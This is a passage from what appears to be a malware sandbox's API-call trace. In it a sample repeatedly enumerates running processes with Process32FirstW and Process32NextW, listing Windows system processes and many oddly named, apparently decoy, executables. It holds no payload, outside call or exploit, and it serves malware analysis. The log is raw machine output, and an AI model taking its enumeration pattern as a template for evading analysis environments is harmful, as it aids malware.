(in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0107.213] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.214] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0107.215] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0107.215] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0107.216] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0107.217] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.217] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.218] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.219] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.220] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.220] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0107.221] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.222] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.222] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0107.224] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.225] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0107.226] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0107.227] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0107.228] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0107.229] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.231] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0107.232] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0107.233] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0107.234] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0107.235] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0107.236] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0107.237] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0107.238] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0107.239] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0107.241] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) 
returned 1 [0107.242] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0107.246] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0107.247] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0107.248] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0107.249] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0107.250] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0107.252] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="pickup.exe")) returned 1 [0107.253] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0107.253] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0107.255] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0107.256] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0107.257] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.258] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0107.259] CloseHandle (hObject=0xc4) returned 1 [0107.259] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0107.263] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.264] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0107.265] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0107.266] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.266] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0107.267] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.268] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0107.269] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0107.270] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0107.271] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0107.272] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.272] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.273] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.274] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.274] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.275] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0107.276] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.277] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.277] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0107.279] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.280] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0107.282] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0107.283] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0107.285] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0107.286] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.287] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0107.288] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0107.289] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0107.369] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0107.371] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0107.372] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0107.373] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0107.375] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0107.376] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0107.377] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0107.379] Process32NextW (in: hSnapshot=0xbc, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0107.380] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0107.381] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0107.383] Process32NextW (in: hSnapshot=0xbc, 